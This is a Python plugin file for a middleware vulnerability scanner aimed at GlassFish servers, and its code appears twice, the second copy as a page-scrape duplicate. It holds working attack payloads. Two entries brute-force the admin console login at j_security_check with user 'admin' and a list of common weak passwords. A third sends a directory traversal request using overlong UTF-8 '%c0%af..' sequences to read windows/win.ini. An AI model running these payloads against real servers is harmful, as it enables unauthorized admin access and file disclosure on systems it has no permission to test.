N-MiddlewareScan/plugins/glassfish_plugin.py

#coding=utf-8
pocs=[
    {"requests_option":"POST",
     "url":["/common/j_security_check"],
     "params":[],
     "data":["j_username=%s&j_password=%s&loginButton=Login&loginButton.DisabledHiddenField=true"],
     "flag":['Just refresh the page... login will take over', 'GlassFish Console - Common Tasks','/resource/common/js/adminjsf.js\">', 'Admin Console</title>', 'src=\"/homePage.jsf\"','src=\"/header.jsf\"', '<title>Common Tasks</title>', 'title=\"Logout from GlassFish'],
     "success":"exist /common/j_security_check weak password",
     "fail":"NOT exist /common/j_security_check weak password",
     "end":"",
     "admin_bursk":"True",
     "username":['admin'],
     "password":['admin', 'glassfish', 'password', '123456', '12345678', '123456789', 'admin123', 'admin888','admin1', 'administrator', '8888888', '123123', 'manager', 'root'],
     },
    {"requests_option":"POST",
     "url":["/j_security_check?loginButton=Login"],
     "params":[],
     "data":["j_username=%s&j_password=%s&loginButton=Login&loginButton.DisabledHiddenField=true"],
     "flag":['Just refresh the page... login will take over', 'GlassFish Console - Common Tasks','/resource/common/js/adminjsf.js\">', 'Admin Console</title>', 'src=\"/homePage.jsf\"','src=\"/header.jsf\"', 'src=\"/index.jsf\"', '<title>Common Tasks</title>','title=\"Logout from GlassFish'],
     "success":"exist /j_security_check?loginButton=Login weak password",
     "fail":"NOT exist /j_security_check?loginButton=Login weak password",
     "end":"/j_security_check?loginButton=Login 测试结束",
     "admin_bursk":"True",
     "username":['admin'],
     "password":['admin', 'glassfish', 'password', 'adminadmin', '123456', '12345678', '123456789', 'admin123','admin888', 'admin1', 'administrator', '8888888', '123123', 'manager', 'root'],
     },
    {"requests_option":"GET",
     "url":["/theme/META-INF/prototype%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%afwindows/win.ini"],
     "params":[],
     "data":[],
     "flag":["[fonts]", "root"],
     "success":"exist Directory_traversal vuln",
     "fail":"NOT exist Directory_traversal vuln",
     "end":"exist Directory_traversal vuln 测试结束",
     "admin_bursk":"",
     "username":[],
     "password":[],
     },
]
new plugin 2019-03-28 23:56:13 +08:00			`#coding=utf-8`
			`pocs=[`
			`{"requests_option":"POST",`
			`"url":["/common/j_security_check"],`
			`"params":[],`
			`"data":["j_username=%s&j_password=%s&loginButton=Login&loginButton.DisabledHiddenField=true"],`
			`"flag":['Just refresh the page... login will take over', 'GlassFish Console - Common Tasks','/resource/common/js/adminjsf.js\">', 'Admin Console</title>', 'src=\"/homePage.jsf\"','src=\"/header.jsf\"', '<title>Common Tasks</title>', 'title=\"Logout from GlassFish'],`
			`"success":"exist /common/j_security_check weak password",`
			`"fail":"NOT exist /common/j_security_check weak password",`
			`"end":"",`
			`"admin_bursk":"True",`
			`"username":['admin'],`
			`"password":['admin', 'glassfish', 'password', '123456', '12345678', '123456789', 'admin123', 'admin888','admin1', 'administrator', '8888888', '123123', 'manager', 'root'],`
			`},`
			`{"requests_option":"POST",`
			`"url":["/j_security_check?loginButton=Login"],`
			`"params":[],`
			`"data":["j_username=%s&j_password=%s&loginButton=Login&loginButton.DisabledHiddenField=true"],`
			`"flag":['Just refresh the page... login will take over', 'GlassFish Console - Common Tasks','/resource/common/js/adminjsf.js\">', 'Admin Console</title>', 'src=\"/homePage.jsf\"','src=\"/header.jsf\"', 'src=\"/index.jsf\"', '<title>Common Tasks</title>','title=\"Logout from GlassFish'],`
			`"success":"exist /j_security_check?loginButton=Login weak password",`
			`"fail":"NOT exist /j_security_check?loginButton=Login weak password",`
			`"end":"/j_security_check?loginButton=Login 测试结束",`
			`"admin_bursk":"True",`
			`"username":['admin'],`
			`"password":['admin', 'glassfish', 'password', 'adminadmin', '123456', '12345678', '123456789', 'admin123','admin888', 'admin1', 'administrator', '8888888', '123123', 'manager', 'root'],`
			`},`
			`{"requests_option":"GET",`
			`"url":["/theme/META-INF/prototype%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%afwindows/win.ini"],`
			`"params":[],`
			`"data":[],`
			`"flag":["[fonts]", "root"],`
			`"success":"exist Directory_traversal vuln",`
			`"fail":"NOT exist Directory_traversal vuln",`
			`"end":"exist Directory_traversal vuln 测试结束",`
			`"admin_bursk":"",`
			`"username":[],`
			`"password":[],`
			`},`
			`]`